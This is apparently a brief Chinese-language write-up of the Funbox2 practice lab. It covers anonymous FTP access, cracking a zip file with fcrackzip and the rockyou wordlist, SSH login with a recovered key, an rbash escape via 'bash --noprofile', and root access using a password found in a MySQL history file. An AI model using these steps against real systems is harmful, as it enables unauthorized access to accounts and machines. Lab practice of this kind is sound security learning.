funbox2靶场笔记

信息收集开放21,22,80端口

21端口存在ftp匿名访问,下载压缩包,有密码,直接破解

ftp简单命令

ftp ip
anonymous#匿名用户
ls
cd
pwd
lpwd
get
pwd
mget

使用工具fcrackzip

fcrackzip -D -u -p rockyou.txt tom.zip
-D 使用字典

rockyou字典所在目录

/usr/share/wordlists

解压命令

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

解密出私钥,使用ssh私钥登录tom用户

ssh -i id_rsa [email protected]

funbox2靶场笔记_第1张图片

 

存在rbash限制

绕过rbash限制

ssh -i id_rsa [email protected] -t "bash --noprofile"

根目录下发现MySQL历史命令文件,从中获取密码

 funbox2靶场笔记_第2张图片

 

密码

funbox2靶场笔记_第3张图片

 

su - root

切换root权限,拿下flag

funbox2靶场笔记_第4张图片

 失去故土的花朵,回不去,却也离不开

你可能感兴趣的:(靶机实战笔记,笔记)